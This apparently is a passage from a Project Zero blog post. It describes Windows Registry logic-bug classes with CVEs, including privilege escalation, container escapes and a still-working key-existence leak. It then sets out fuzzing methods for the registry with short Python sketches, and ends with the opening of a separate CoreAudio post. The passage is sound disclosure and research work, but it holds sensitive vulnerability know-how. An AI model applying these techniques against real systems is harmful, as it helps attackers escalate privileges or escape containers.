    Besides maintaining internal consistency and being free of low-level bugs, it's also important that the registry behaves logically and predictably, even under unusual conditions. It must adhere to the overall security model of Windows NT, operate in accordance with its public documentation, and behave in a way that aligns with common sense expectations. Failure to do so could result in various problems in the client software that interacts with it, but identifying such deviations from expected behavior can be challenging, as it requires deep understanding of the interface's high-level principles and the practical implications of violating them.

    In the following subsections, I will discuss a few examples of issues where the registry's behavior was inconsistent with documentation, system architecture, or common sense.

    Security access rights enforcement

    The registry implementation must enforce security checks, meaning it must verify appropriate access rights to a key when opening it, and then again when performing specific operations on the obtained handle. Generally, the registry manages this well in most cases. However, there were two bugs in the past that allowed a local user to perform certain operations that they theoretically didn't have sufficient permissions for:

    • CVE-2023-21750: Due to a logic bug in the CmKeyBodyRemapToVirtual function (related to registry virtualization), it was possible to delete certain keys within the HKLM\Software hive with only KEY_READ and KEY_SET_VALUE rights, without the normally required DELETE right.
    • CVE-2023-36404: In this case, it was possible to gain access to the values of certain registry keys despite lacking appropriate rights. The attack itself was complex and required specific circumstances: loading a differencing hive overlaid on a system hive with a specially crafted key structure, and then having a system component create a secret key in that system hive. Because of the fact that the handle to the layered key would be opened earlier (and the security access check would be performed at that point in time), creating a new key at a lower level with more restricted permissions wouldn't be considered later, leading to potential information disclosure.

    As shown, both these bugs were directly related to incorrect or missing permissions verification, but they weren't particularly attractive in terms of practical attacks. A much more appealing bug was CVE-2019-0881, discovered in registry virtualization a few years earlier by James Forshaw. That vulnerability allowed unprivileged users to read every registry value in the system regardless of the user's privileges, which is about as powerful as a registry infoleak can get.

    Confused deputy problems with predefined keys

    Predefined keys probably don't need any further introduction at this point in the series. In this specific case of the confused deputy problem, the bug report for CVE-2023-35633 captures the essence of the issue well: if a local attacker had binary control over a hive, they could cause the use of an API like RegOpenKeyExW on any key within that hive to return one of the predefined pseudo-handles like HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, etc., instead of a normal handle to that key. This behavior was undocumented and unexpected for developers using the registry in their code. Unsurprisingly, finding a privileged process that did something interesting on a user-controlled hive wasn't that hard, and it turned out that there was indeed a service in Windows that opened a key inside the HKCU of each logged-in user, and recursively set permissive access rights on that key. By abusing predefined handles, it was possible to redirect the operation and grant ourselves full access to one of the global keys in the system, leading to a fairly straightforward privilege escalation. If you are interested in learning more about the bug and its practical exploitation, please refer to my Windows Registry Deja Vu: The Return of Confused Deputies presentation from CONFidence 2024. In many ways, this attack was a resurrection of a similar confused deputy problem, CVE-2010-0237, which I had discovered together with Gynvael Coldwind. The main difference was that at that time, the redirection of access to keys was achieved via symbolic links, a more obvious and widely known mechanism.

    Atomicity of KTM transactions

    The main feature of any transaction implementation is that it should guarantee atomicity – that is, either apply all changes being part of the transaction, or none of them. Imagine my surprise then, when I discovered that the registry transaction implementation integrated with the KTM did not guarantee atomicity at all, but merely tried really hard to maintain it. The main problem was that it wasn't designed to handle OOM errors (for example, when a hive was completely full) and, as a result, when such a problem occurred in the middle of committing a transaction, there was no good way to reverse the changes already applied. The Configuration Manager falsely returned a success code to the caller, while retrying to commit the remaining part of the transaction every 30 seconds, hoping that some space would free up in the registry in the meantime, and the operations would eventually succeed. This type of behavior obviously contradicted both the documentation and common sense about how transactions should work.

    I reported this issue as CVE-2023-32019, and Microsoft fixed it by completely removing a large part of the code that implemented this functionality, as it was simply impossible to fix correctly without completely redesigning it from scratch. Fortunately, in Windows 10, an alternative transaction implementation for the registry called lightweight transactions was introduced, which was designed correctly and did not have the same problem. As a result, a decision was made to internally redirect the handling of KTM transactions within the Windows kernel to the same engine that is responsible for lightweight transactions.

    Containerized registry escapes

    The general goal of differencing hives and layered keys is to implement registry containerization. This mechanism creates an isolated registry view for a specific group of processes, without direct access to the host registry (a sort of "chroot" for the Windows registry). Unfortunately, there isn't much official documentation on this topic, and it's particularly difficult to find information on whether this type of containerization is a Microsoft-supported security boundary that warrants fixes in the monthly security bulletins. I think it is reasonable to expect that since the mechanism is used to isolate the registry in well supported use-cases (such as running Docker containers), it should ideally not be trivial to bypass, but I was unable to find any official statement to support or refute this assumption.

    When I looked further into it, I discovered that the redirection of registry calls within containerized environments was managed by registry callbacks, specifically one called VrpRegistryCallback. While callbacks do indeed seem well suited for this purpose, the devil is in the details – specifically, error handling. I found at least two ways a containerized application could trigger an error during the execution of the internal VrpPreOpenOrCreate/VrpPostOpenOrCreate handlers. This resulted in exiting the callback prematurely while an important part of the redirection logic still hadn't been executed, and consequently led to the process gaining access to the host's registry view. Additionally, I found that another logical bug allowed access to the host's registry through differencing hives associated with other active containers in the system.

    As I mentioned, I wasn't entirely clear on the state of Microsoft's support for this mechanism, but luckily I didn't have to wonder for too long. It turned out that James Forshaw had a similar dilemma and managed to reach an understanding with the vendor on the matter, which he described in his blog post.

    After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable.

    [...]

    Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.


    Eventually, I reported all three bugs in one report, and Microsoft fixed them shortly after as CVE-2023-36576. I particularly like the first issue described in the report (the bug in VrpBuildKeyPath), as it makes a very interesting example of how a theoretically low-level issue like a 16-bit integer overflow can have the high-level consequences of a container escape, without any memory corruption being involved.

    Adherence to official key and value name length limits

    The constraints on the length of key and value names are quite simple. Microsoft defines the maximum values on a dedicated documentation page called Registry Element Size Limits:

    Registry element    Size limit
    ----------------    ----------
    Key name            255 characters. The key name includes the absolute path of the key in the registry, always starting at a base key, for example, HKEY_LOCAL_MACHINE.
    Value name          16,383 characters. Windows 2000: 260 ANSI characters or 16,383 Unicode characters.

    Admittedly, the way this is worded is quite confusing, and I think it would be better if the information in the second column simply ended after the first period. As it stands, the explanation for "key name" seems to suggest that the 255-character limit applies to the entire key path relative to the top-level key. In reality, the limit of 255 (or to be precise, 256) characters applies to the individual name of each registry key, and value names are indeed limited to 16,383 characters. These assumptions are the basis for the entire registry code.

    Given that these are fundamental and documented values, it may be surprising that the requirements weren't correctly verified in the hive loading code until October 2022. Specifically, it was possible to load a hive containing a key with a name of up to 1040 characters. Furthermore, the length of a value's name wasn't checked at all, meaning it could consist of up to 65535 characters, which is the maximum value of the uint16 type representing its length. In both cases, it was possible to exceed the theoretical limits set by the documentation by more than four times.

    I reported these bugs as part of the CVE-2022-37991 report. On a default Windows installation, I found a way to potentially exploit (or at least trigger a reproducible crash) the missing check for the value name length, but I couldn't demonstrate the consequences of an overly long key name. Nevertheless, I'm convinced that with a bit more research, one could find an application or driver implementing a registry callback that assumes key names cannot be longer than 255 characters, leading to a buffer overflow or other memory corruption. This example clearly shows that even the official documentation cannot be trusted, and all assumptions, even the most fundamental ones, must be verified directly in the code during vulnerability research.
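    A loader that enforces the documented limits could be sketched as follows (a minimal illustrative check, not the actual kernel code; the 1040 and 65,535 figures correspond to the pre-fix behavior described above):

```python
# Documented limits: 256 characters per individual key name
# ("255, or to be precise, 256"), 16,383 characters per value name.
MAX_KEY_NAME = 256
MAX_VALUE_NAME = 16383

def validate_name(name, is_value):
    limit = MAX_VALUE_NAME if is_value else MAX_KEY_NAME
    return len(name) <= limit

assert validate_name("A" * 256, is_value=False)
assert not validate_name("A" * 1040, is_value=False)   # accepted by pre-2022 loaders
assert not validate_name("A" * 65535, is_value=True)   # value-name length wasn't checked at all
```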

    Creation of stable keys under volatile ones

    Another rational behavior of the registry is that it doesn't allow you to create Stable keys under Volatile parent keys. This makes sense, as stable keys are stored on disk and persist through hive unload and system reboot, whereas volatile keys only exist in memory and vanish when the hive is unloaded. Consequently, a stable key under a volatile one wouldn't be practical, as its parent would disappear after a restart, severing its path to the registry tree root, causing the stable key to disappear as well. Therefore, under normal conditions, creating such a key is impossible, and any attempt to do so results in the ERROR_CHILD_MUST_BE_VOLATILE error being returned to the caller. While there's no official mention of this in the documentation (except for a brief description of the error code), Raymond Chen addressed it on his blog, providing at least some documentation of this behavior.

    During my research, I discovered two ways to bypass this requirement and create stable keys under volatile ones. These were issues CVE-2023-21748 and CVE-2024-26173, where the first one was related to registry virtualization, and the second to transaction support. Interestingly, in both of these cases, it was clear that a certain invariant in the registry design was being broken, but it was less clear whether this could have any real consequences for system security. After spending some time on analysis, I came to the conclusion that there was at least a theoretical chance of some security impact, due to the fact that security descriptors of volatile keys are not linked together into a global linked list in the same way stable security descriptors are. Long story short, if later in time some other stable keys in the hive started to share the security descriptor of the stable-under-volatile one, then their security would become invalidated and forcibly reset to their parent's descriptor on the next system reboot, violating the security model of the registry. Microsoft apparently shared my assessment of the situation, as they decided to fix both bugs as part of a security bulletin. Still, this is an interesting illustration of the complexity of the registry – sometimes finding an anomaly in the kernel logic can generate some kind of inconsistent state, but its implications might not be clear without further, detailed analysis.

    Arbitrary key existence information leak

    If someone were to ask me whether an unprivileged user should be able to check for the existence of a registry key without having any access rights to that key or its parent in a secure operating system, I would say absolutely not. However, this is possible on Windows, because the code responsible for opening keys first performs a full path lookup, and only then checks the access rights. This allows for differentiation between existing keys (return value STATUS_ACCESS_DENIED) and non-existing keys (return value STATUS_OBJECT_NAME_NOT_FOUND).
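    The root cause can be modeled in a few lines (a deliberately simplified stand-in for the real key-open path; the numeric status values are the standard NTSTATUS codes, but everything else is invented for the example):

```python
STATUS_SUCCESS = 0
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_OBJECT_NAME_NOT_FOUND = 0xC0000034

def open_key(tree, path, caller_has_access):
    # The full path lookup happens first...
    node = tree
    for part in path.split("\\"):
        if part not in node:
            return STATUS_OBJECT_NAME_NOT_FOUND
        node = node[part]
    # ...and the access check only afterwards, so the returned error code
    # differs depending on whether the key exists at all.
    return STATUS_SUCCESS if caller_has_access else STATUS_ACCESS_DENIED

tree = {"Secret": {"SubKey": {}}}
# An unprivileged caller can distinguish the two cases:
assert open_key(tree, "Secret\\SubKey", caller_has_access=False) == STATUS_ACCESS_DENIED
assert open_key(tree, "Secret\\Other", caller_has_access=False) == STATUS_OBJECT_NAME_NOT_FOUND
```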

    After discovering this behavior, I decided to report it to Microsoft in December 2023. The vendor's response was that it is indeed a bug, but its severity is not high enough to be fixed as an official vulnerability. I somewhat understand this interpretation, as the amount of information that can be disclosed in this way is quite low (i.e. limited configuration elements of other users), and fixing the issue would probably involve significant code refactoring and a potential performance decrease. It's also difficult to say whether this type of boundary is properly defensible, because after one fix it might turn out that there are many other ways to leak this type of information. Therefore, the technique described in my report still works at the time of writing this blog post.

    Miscellaneous

    In addition to the bug classes mentioned above, there are also many other types of issues that can occur in the registry. I certainly won't be able to name them all, but briefly, here are a few more primitives that come to mind when I think about registry vulnerabilities:

    • Low-severity security bugs: These include local DoS issues such as NULL pointer dereferences, infinite loops, direct KeBugCheckEx calls, as well as classic memory leaks, low-quality out-of-bounds reads, and others. The details of a number of such bugs can be found in the p0tools/WinRegLowSeverityBugs repository on GitHub.
    • Real, but unexploitable bugs: These are bugs that are present in the code, but cannot be exploited due to some mitigating factors. Examples include bugs in the CmpComputeComponentHashes and HvCheckBin internal functions.
    • Memory management bugs: These bugs are specifically related to the management of hive section views in the context of the Registry process. This especially applies to situations where the hive is loaded from a file on a removable drive, from a remote SMB share, or from a file on a local disk but with unusual semantics (e.g., a placeholder file created through the Cloud Filter API). Two examples of this vulnerability type are CVE-2024-43452 and CVE-2024-49114.
    • Unusual primitives: These are various non-standard primitives that are simply too difficult to categorize, such as CVE-2024-26177, CVE-2024-26178, WinRegLowSeverityBugs #19, or WinRegLowSeverityBugs #20.

    Fuzzing considerations

    Due to the Windows Registry's strictly defined format (regf) and interface (around a dozen specific syscalls that operate on it), automated testing in the form of fuzzing is certainly possible. We are dealing with kernel code here, so it's not as simple as taking any library that parses a file format and connecting it to a standard fuzzer like AFL++, Honggfuzz, or Jackalope – registry fuzzing requires a bit more work. But, in its simplest form, it could consist of just a few trivial steps: finding an existing regf file, writing a bit-flipping mutator, writing a short harness that loads the hive using RegLoadAppKey, and then running those two programs in an infinite loop and waiting for the system to crash.
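    The mutation step of such a minimal loop might look like the following toy bit-flipping mutator (the actual hive loading via RegLoadAppKey in the harness is omitted here):

```python
import random

def bitflip(data: bytes, n_flips: int, seed: int) -> bytes:
    """Flip n_flips randomly chosen bits of the input regf file."""
    rng = random.Random(seed)
    buf = bytearray(data)
    # Pick distinct bit positions so exactly n_flips bits change.
    for bit in rng.sample(range(len(buf) * 8), n_flips):
        buf[bit // 8] ^= 1 << (bit % 8)
    return bytes(buf)

original = bytes(512)  # stand-in for a real regf file read from disk
mutated = bitflip(original, n_flips=4, seed=1)
diff_bits = sum(bin(a ^ b).count("1") for a, b in zip(original, mutated))
assert diff_bits == 4
```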

    It's hard to argue that this isn't some form of fuzzing, and in many cases, these kinds of methods are perfectly sufficient for finding plenty of serious vulnerabilities. After all, my entire months-long research project started with this fairly primitive fuzzing, which did more or less what I described above, with just a few additional improvements:

    • Fixing the hash in the regf header,
    • Performing a few simple operations on the hive, like enumerating subkeys and values,
    • Running on multiple machines at once,
    • Collecting code coverage information from the Windows kernel.
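    The "fixing the hash" improvement refers to the regf base-block checksum which, as far as I know, is the XOR of the first 127 dwords of the header, stored as a dword at offset 508. A sketch (illustrative only, ignoring any edge-case handling real implementations may apply):

```python
import struct

def fix_regf_checksum(header: bytearray) -> None:
    # XOR the first 508 bytes of the base block together as
    # little-endian dwords and store the result at offset 508.
    csum = 0
    for (dword,) in struct.iter_unpack("<I", bytes(header[:508])):
        csum ^= dword
    header[508:512] = struct.pack("<I", csum)

hdr = bytearray(512)
hdr[0:4] = b"regf"  # signature; the rest of this toy header is zeroed
fix_regf_checksum(hdr)
# With only one non-zero dword, the checksum equals that dword.
assert hdr[508:512] == hdr[0:4]
```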

    Despite my best efforts, this type of fuzzing was only able to find one vulnerability (CVE-2022-35768), compared to over 50 that I later discovered manually by analyzing the Windows kernel code myself. This ratio doesn't speak well for fuzzing, and it stems from the fact that the registry isn't as simple a target for automated testing as it might seem. On the contrary, each individual element of such fuzzing is quite difficult and requires a large time investment if one wishes to do it effectively. In the following sections, I'll focus on each of these components (corpus, mutator, harness and bug detection), pointing out what I think could be improved in them compared to the most basic version discussed above.

    Initial corpus

    The first issue a potential researcher may encounter is gathering an initial corpus of input files. Sure, one can typically find dozens of regf files even on a clean Windows installation, but the problem is that they are all very simple and don't exhibit characteristics interesting from a fuzzing perspective. In particular:

    • All of these hives are generated by the same registry implementation, which means that their state is limited to the set of states produced by Windows, and not the wider set of states accepted by the hive loader.
    • The data structures within them are practically never even close to the limits imposed by the format itself, for example:
    • The maximum length of key and value names are 256 and 16,383 characters, but most names in standard hives are shorter than 30 characters.
    • The maximum nesting depth of the tree is 512 levels, but in most hives, the nesting doesn't exceed 10 levels.
    • The maximum number of keys and values in a hive is limited only by the maximum space of 2 GiB, but standard hives usually include at most a few subkeys and associated values – certainly not the quantities that could trigger any real bugs in the code.

    This means that gathering a good initial corpus of hives is very difficult, especially considering that there aren't many interesting regf hives available on the Internet, either. The other options are as follows: either simply accept the poor starting corpus and hope that these shortcomings will be made up for by a good mutator (see next section), especially if combined with coverage-based fuzzing, or try to generate a better one yourself by writing a generator based on one of the existing interfaces (the kernel registry implementation, the user-mode Offline Registry Library, or some other open-source library). As a last resort, you could also write your own regf file generator from scratch, where you would have full control over every aspect of the format and could introduce any variance at any level of abstraction. The last approach is certainly the most ambitious and time-consuming, but could potentially yield the best results.
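    A generator operating on a purely logical model could deliberately steer toward these limits. The sketch below (illustrative only; serialization of the resulting tree to the actual regf format is omitted) produces key trees with boundary-length names and deep nesting:

```python
import random

def generate_tree(rng, depth_budget, breadth):
    # Generate a logical key tree that pushes toward format limits:
    # boundary-length names, deep nesting, variable branching.
    name_len = rng.choice([1, 30, 255, 256])  # include the documented boundaries
    node = {"name": "K" * name_len, "subkeys": []}
    if depth_budget > 0:
        for _ in range(rng.randrange(breadth + 1)):
            node["subkeys"].append(generate_tree(rng, depth_budget - 1, breadth))
    return node

def max_depth(node):
    return 1 + max((max_depth(s) for s in node["subkeys"]), default=0)

rng = random.Random(7)
tree = generate_tree(rng, depth_budget=511, breadth=1)
assert 1 <= max_depth(tree) <= 512  # stays within the 512-level nesting limit
```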

    Mutator

    Overall, the issue with the mutator is very similar to the issue with the initial corpus. In both cases, the goal is to generate the most "interesting" regf files possible, according to some metric. However, in this case, we can no longer ignore the problem and hope for the best. If the mutator doesn't introduce any high-quality changes to the input file, nothing else will. There is no way around it – we have to figure out how to make our mutator test as much state of the registry implementation as possible.

    For simplicity, let's assume the simplest possible mutator that randomly selects N bits in the input data and flips them, and/or selects some M bytes and replaces them with other random values. Let's consider for a moment what logical types of changes this approach can introduce to the hive structure:

    • Enable or disable some flags, e.g., in the _CM_KEY_NODE.Flags field,
    • Change the value of a field indicating the length of an array or list, e.g., _CM_KEY_NODE.NameLength, _CM_KEY_VALUE.DataLength, or a 32-bit field indicating the size of a given cell,
    • Slightly change the name of a key or value, or the data in the backing cell of a value,
    • Corrupt a value sanitized during hive loading, causing the object to be removed from the hive during the self-healing process,
    • Change the value of some cell index, usually to an incorrect value,
    • Change/corrupt the binary representation of a security descriptor in some way.

    This may seem like a broad range of changes, but in fact, each of them is very local and uncoordinated with other modifications in the file. This can be compared to binary mutation of an XML file – sometimes we may corrupt/remove some critical tag or attribute, or even change some textually encoded number to another valid number – but in general, we should not expect any interesting structural changes to occur, such as changing the order of objects, adding/removing objects, duplicating objects, etc. Hives are very similar in nature. For example, it is possible to set the KEY_SYM_LINK flag in a key node by pure chance, but for this key to actually become a valid symlink, it is also necessary to remove all its current values, and add a new value named "SymbolicLinkValue" of type REG_LINK containing a fully qualified registry path. With a mutator operating on single bits and bytes, the probability of this happening is effectively zero.
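    A structure-aware mutation that creates a valid symlink could look like the following sketch, operating on a toy logical key model rather than raw cells (the KEY_SYM_LINK and REG_LINK constants match their documented values, but everything else is invented for the example):

```python
KEY_SYM_LINK = 0x0010  # _CM_KEY_NODE.Flags bit marking a symlink key
REG_LINK = 6           # value type holding a symbolic link target

def make_symlink(key, target_path):
    """Coordinated mutation: several changes have to happen at once
    for the key to become a well-formed registry symlink."""
    key["flags"] |= KEY_SYM_LINK
    key["values"] = [{                 # drop all existing values...
        "name": "SymbolicLinkValue",   # ...and add exactly this one
        "type": REG_LINK,
        "data": target_path,
    }]

key = {"flags": 0, "values": [{"name": "Old", "type": 1, "data": "x"}]}
make_symlink(key, "\\Registry\\Machine\\Software\\Target")
assert key["flags"] & KEY_SYM_LINK
assert [v["name"] for v in key["values"]] == ["SymbolicLinkValue"]
```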

    In my opinion, a dedicated regf mutator would need to operate simultaneously on four levels of abstraction, in order to be able to create the conditions necessary for triggering most bugs:

    1. On the high-level structure of a hive, where only logical objects matter: keys, values, security descriptors, and the relationships between them. Mutations could involve adding, removing, copying, moving, and changing the internal properties of these three main object types. These mutations should generally conform to the regf format, but sometimes push the boundaries by testing edge cases like handling long names, a large number of subkeys or values, or a deeply nested tree.
    2. On the level of specific cell types, which can represent the same information in many different ways. This primarily refers to all kinds of lists that connect higher-level objects, particularly subkey lists (index leaves, fast leaves, hash leaves, root indexes), value lists, and linked lists of security descriptors. Where permitted by the format (or sometimes even in violation of the format), the internal representation of these lists could be changed, and its elements could be rearranged or duplicated.
    3. On the level of cell and bin layout: taking the entire set of interconnected cells as input, they could be rearranged in different orders, in bins of different sizes, sometimes interspersed with empty (or artificially allocated) cells or bins. This could be used to find vulnerabilities specifically related to hive memory management, and also to potentially facilitate triggering/reproducing hive memory corruption issues more reliably.
    4. On the level of bits and bytes: although this technique is not very effective on its own, it can complement more intelligent mutations. You never know what additional problems can be revealed through completely random changes that may not have been anticipated when implementing the previous ideas. The only caveat is to be careful with the number of those bit flips, as too many of them could negate the overall improvement achieved through higher-level mutations.

    As you can see, developing a good mutator requires some consideration of the hive at many levels, and would likely be a long and tedious process. The question also remains whether the time spent in this way would be worth it compared to the effects that can be achieved through manual code analysis. This is an open question, but as a fan of the registry, I would be thrilled to see an open-source project equivalent to fonttools for regf files, i.e., a library that allows "decompiling" hives into XML (or similar) and enables efficient operations on that representation. One can only dream... 🙂

    Finally, I would like to point out that regf files are not the only type of input for which a dedicated mutator could be created. As I've already mentioned before, there are also accompanying .LOG1/.LOG2 and .blf/.regtrans-ms files, responsible for the atomicity of individual registry operations and KTM transactions, respectively. Both types of files may not be as complex as the core hive files, but mutating them might still be worthwhile, especially since some bugs have been historically found in their handling. Additionally, other registry operations performed by the harness could also be treated as part of the input. This would resemble an architecture similar to Syzkaller, and storing registry call sequences as part of the corpus would require writing a special grammar-based mutator, or possibly adapting an existing one.

    Harness

    While having a good mutator for registry-related files is a great start, the vast majority of potential vulnerabilities do not manifest when loading a malformed hive, but only during further operations on said hive. These bugs are mainly related to some complex and unexpected state that has arisen in the registry, and triggering it usually requires a very specific sequence of system calls. Therefore, a well-constructed harness should support a broad range of registry operations in order to effectively test as many different internal states as possible. In particular, it should:

    • Perform all standard operations on keys (opening, creating, deleting, renaming, enumerating, setting properties, querying properties, setting notifications), values (setting, deleting, enumerating, querying data) and security descriptors (querying keys for security descriptors, setting new descriptors). For the best result, it would be preferable to randomize the values of their arguments (to a reasonable extent), as well as the order in which the operations are performed.
    • Support a  "deferred close" mechanism, i.e. instead of closing key handles immediately, maintain a certain cache of such handles to refer to them at a later point in time. In particular, the idea is to sometimes perform an operation on a key that has been deleted, renamed or had its hive unloaded, in order to trigger potential bugs related to object lifetime or the verification that a given key actually exists prior to performing any action on it.
    • Load input hives with different flags. The main point here is to load hives with and without the REG_APP_HIVE flag, as the differences in the treatment of app hives and regular hives are sometimes significant enough to warrant testing both scenarios. Randomizing the states of the other few flags that can take arbitrary values could also yield positive results.
    • Support the registry virtualization mechanism, which can consist of several components:
    • Periodically enabling and disabling virtualization for the current process using the SetTokenInformation(TokenVirtualizationEnabled) call,
    • Setting various virtualization flags for individual keys using the NtSetInformationKey(KeySetVirtualizationInformation) call,
    • Creating an additional key structure under the HKU\<SID>_Classes\VirtualStore tree to exercise the mechanism of key replication / merging state in "query" type operations (e.g. in enumeration of the values of a virtualized key).
    • Use transactions, both KTM and lightweight. In particular, it would be useful to mix non-transactional calls with transactional ones, as well as transactional calls within different transactions. This way, we would be able to exercise the code paths responsible for making sure that no two transactions collide with each other, and that non-transactional operations always roll back the entire transactional state before making any changes to the registry. It would also be beneficial if some of these transactions were committed and some rolled back, to test as much of their implementation as possible.
    • Support layered keys. For many registry operations, the layered key implementation is completely different than the standard one, and almost always more complicated. However, adding differencing hive support to the fuzzer wouldn't be trivial, as it would require additional communication with VRegDriver to load/unload the hive. It would also require making some fundamental decisions: which hive(s) do we overlay our input hive on top of? Should we keep pairs of hives in the corpus and overlay them one on top of the other, in order to control the properties of all the keys on the layered key stack? Do we limit ourselves to a key stack of two elements, or create more complicated stacks consisting of three or more hives? These are all open questions to which I don't know the answer, but I am sure that implementing some form of layered key support would positively affect the number of vulnerabilities that could be found this way.
    • Potentially support multi-threading and execute the harness logic in multiple threads at once, allowing it to trigger potential race conditions. The downside of this idea is that unless we run the fuzzing in some special environment, it would probably be non-deterministic, making timing-related bugs difficult to reproduce.
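    A skeletal harness built around some of these ideas might look as follows. The MockRegistry class is a stand-in for the real syscall interface, used here only to show the overall shape of random operation sequences plus a deferred-close cache; a real harness would issue NtCreateKey/NtDeleteKey/NtSetValueKey calls instead:

```python
import random

class MockRegistry:
    # Stand-in for the real syscall interface; only here to show the harness shape.
    def __init__(self):
        self.keys = {}
        self.handles = {}
        self.next_handle = 1

    def create(self, path):
        self.keys[path] = {}
        handle = self.next_handle
        self.next_handle += 1
        self.handles[handle] = path
        return handle

    def delete(self, handle):
        self.keys.pop(self.handles.get(handle), None)

    def set_value(self, handle, name, data):
        path = self.handles.get(handle)
        if path not in self.keys:
            return "STATUS_KEY_DELETED"  # the key is gone, but the handle lives on
        self.keys[path][name] = data
        return "STATUS_SUCCESS"

rng = random.Random(0)
reg = MockRegistry()
cache = []  # deferred-close cache: handles are kept around instead of being closed
for i in range(100):
    op = rng.choice(["create", "delete", "set_value"])
    if op == "create" or not cache:
        cache.append(reg.create(f"\\K{i}"))
    elif op == "delete":
        reg.delete(rng.choice(cache))  # note: the handle stays in the cache
    else:
        reg.set_value(rng.choice(cache), "V", b"data")

# Deferred close in action: operating on a deleted key through a cached
# handle is exactly what exercises object-lifetime checks in the kernel.
h = reg.create("\\Victim")
reg.delete(h)
assert reg.set_value(h, "V", b"data") == "STATUS_KEY_DELETED"
```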

    The final consideration for harness development is the prevalence of registry issues caused by improper error handling, particularly cell allocator out-of-memory errors. A potential harness feature could be to artificially trigger these circumstances, perhaps by aggressively filling almost all of the 2 GiB stable/volatile space, causing HvAllocateCell/HvReallocateCell functions to fail. However, this approach would waste significant disk space and memory, and substantially slow down fuzzing, so the net benefit is unclear. Alternative options include hooking the allocator functions to make them fail for a specific fraction of requests (e.g., using DTrace), or applying a runtime kernel modification to reduce the maximum hive space size from 2 GiB to some smaller value (e.g., 16 MiB). These ideas are purely theoretical and would require further testing.
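    The allocator-hooking idea could be prototyped along these lines (a language-agnostic sketch in Python; an actual implementation would hook HvAllocateCell with DTrace or a kernel patch rather than wrap a function):

```python
import random

def make_faulty_alloc(alloc, failure_rate, seed):
    # Wrap an allocator so that a fixed fraction of requests fail,
    # approximating what a fault-injection probe on the cell allocator
    # might do. A fixed seed keeps failing runs reproducible.
    rng = random.Random(seed)
    def faulty(size):
        if rng.random() < failure_rate:
            return None  # simulated out-of-memory failure
        return alloc(size)
    return faulty

alloc = make_faulty_alloc(bytearray, failure_rate=0.25, seed=42)
results = [alloc(64) for _ in range(1000)]
failures = sum(r is None for r in results)
assert 0 < failures < 1000  # some, but not all, allocations fail
```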

    Bug detection

    Alongside a good initial corpus, mutator and harness, the fourth and final pillar of an effective fuzzing session is bug detection. After all, what good is it to generate an interesting sample and trigger a problem with a series of complicated calls, if we don't even notice the bug occurring? In typical user-mode fuzzing, bug detection is assisted by tools such as AddressSanitizer, which are integrated into the build process and add extra instrumentation to the binary to enable the detection of all invalid memory references taking place in the code. In the case of the Windows kernel, a similar role is played by the Special Pool, which isolates individual allocations on kernel pools to maximize the probability of a crash when an out-of-bounds access/use-after-free condition occurs. Additionally, it may also be beneficial to enable the Low Resources Simulation mechanism, which can cause some pool allocations to fail and thus potentially help in triggering bugs related to handling OOM conditions.

    The challenge with the registry lies in the fact that most bugs don't stem from memory corruption within the kernel pools. Typically, we're dealing with either hive-based memory corruption or its early stage—an inconsistent state within the registry that violates a crucial invariant. Reaching memory corruption in such a scenario necessitates additional steps from an attacker. For instance, consider a situation where the reference count of a security descriptor is decremented without removing a reference to it in a key node. To trigger a system bugcheck, one would need to remove all other references to that security descriptor (e.g., by deleting keys), overwrite it with different data (e.g., by setting a value), and then perform an operation on it or one of its adjacent descriptors that would lead to a system crash. Each extra step significantly decreases the likelihood of achieving the desired state. The fact that cells have their own allocator further hinders fuzzing, as there's no equivalent of the Special Pool available for it.

    Here are a few ideas for addressing the problem, some more realistic than others:

    • If we had a special library capable of breaking down regf files at various levels of abstraction, we could have the mutator create the input hive in a way that maximizes the chances of a crash if a bug occurs during a cell operation. For example, we could assign each key a separate security descriptor with refcount=1 (which should make triggering UAFs easier) and place each cell at the end of a separate bin, followed by another, empty bin. This behavior would be very similar to how the Special Pool works, but at the bin and cell level.
    • Again, if we had a good regf file parser, we could open the hive saved on disk after each iteration of the harness and verify its internal consistency. This would allow us to catch inconsistent hive states early, even if they didn't lead to memory corruption or a system crash in a specific case.
    • Possibly, instead of implementing the hive parsing and verification mechanism from scratch, one could try to reuse an existing implementation. In particular, an interesting idea would be to use the self-healing property of the registry. Thanks to this, after each iteration, we could theoretically load the hive once again for a short period of time, unload it, and then compare the "before" and "after" representations to see if the loader fixed any parts of the hive during the loading process. We could potentially also try to use the user-mode offreg.dll library for this purpose, which seems to share much of the hive loading code with the Windows kernel, and which would likely be more efficient to call.
    • As part of testing a given hive in a harness, we could periodically fill the entire hive (or at least all its existing bins) with random data to increase the probability of detecting UAFs by overwriting freed objects with incorrect data.
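    As a concrete example of the consistency-checking idea, a verifier could cross-check security descriptor reference counts against the keys that actually use them; the sketch below runs on an invented logical hive representation, not real regf data:

```python
def check_sd_refcounts(hive):
    """Return the IDs of security descriptors whose stored refcount
    disagrees with the number of key nodes actually pointing at them."""
    actual = {}
    for key in hive["keys"]:
        actual[key["sd"]] = actual.get(key["sd"], 0) + 1
    problems = []
    for sd_id, sd in hive["descriptors"].items():
        if sd["refcount"] != actual.get(sd_id, 0):
            problems.append(sd_id)
    return problems

hive = {
    "keys": [{"sd": 1}, {"sd": 1}, {"sd": 2}],
    "descriptors": {1: {"refcount": 2}, 2: {"refcount": 7}},  # descriptor 2 is inconsistent
}
assert check_sd_refcounts(hive) == [2]
```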

    Finally, as an optional step, one could consider implementing checks at the harness level to identify logical issues in registry behavior. For example, after each individual operation, the harness could verify whether the process security token and handle access rights actually allowed it – thereby checking if the kernel correctly performed security access checks. Another idea would be to examine whether all operations within a transaction have been applied correctly during the commit phase. As we can see, there are many potential ideas, but when evaluating their potential usefulness, it is important to focus on the registry behaviors and API contracts that are most relevant to system security.

    Conclusion

    This concludes our exploration of the Windows Registry's role in system security and effective vulnerability discovery techniques. In the next post, we'll stay on the topic of security, but we'll shift our focus from discovering bugs to developing specific techniques for exploiting them. We'll use case studies of some experimental exploits I wrote during my research to demonstrate their practical security implications. See you then!


    Breaking the Sound Barrier Part I: Fuzzing CoreAudio with Mach Messages

    May 9, 2025, 14:38

    Guest post by Dillon Franke, Senior Security Engineer, 20% time on Project Zero

    Every second, highly-privileged MacOS system daemons accept and process hundreds of IPC messages. In some cases, these message handlers accept data from sandboxed or unprivileged processes.

